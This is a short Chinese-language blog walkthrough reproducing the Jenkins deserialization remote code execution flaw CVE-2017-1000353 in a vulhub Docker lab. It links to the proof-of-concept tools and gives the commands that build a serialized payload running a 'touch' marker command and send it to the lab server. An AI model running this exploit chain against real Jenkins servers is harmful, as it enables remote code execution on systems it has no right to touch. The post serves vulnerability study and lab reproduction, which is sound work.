1. 程式人生 > 實用技巧 >Jenkins-CI 遠端程式碼執行漏洞復現(CVE-2017-1000353)

Jenkins-CI 遠端程式碼執行漏洞復現(CVE-2017-1000353)

0x01 環境

使用vulhub搭建漏洞環境

/vulhub-master/jenkins/CVE-2017-1000353

http://192.168.255.130:8080/

0x02 復現

首先下載CVE-2017-1000353-1.1-SNAPSHOT-all.jar,這是生成POC的工具。

https://github.com/vulhub/CVE-2017-1000353/releases/download/1.1/CVE-2017-1000353-1.1-SNAPSHOT-all.jar

執行下面命令,生成位元組碼檔案:

java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "
touch /tmp/CVE-2017-1000353_is_success"

執行上述程式碼後,在當前目錄下生成jenkins_poc.ser檔案,這就是序列化字串。

接著下載exploit.py,https://github.com/vulhub/CVE-2017-1000353/blob/master/exploit.py

【注意】上面連結裡的exploit程式碼需要將Proxies裡面的內容註釋掉,否則會報錯

執行exp

python exploit.py http://192.168.255.130:8080 jenkins_poc.ser

0x03 檢驗

首先檢視環境的CONTAINER ID

sudo docker ps

接著進入容器內部

sudo docker exec -it 容器id bash

檢視/tmp目錄

驗證成功

參考文章:https://blog.csdn.net/JiangBuLiu/article/details/95475293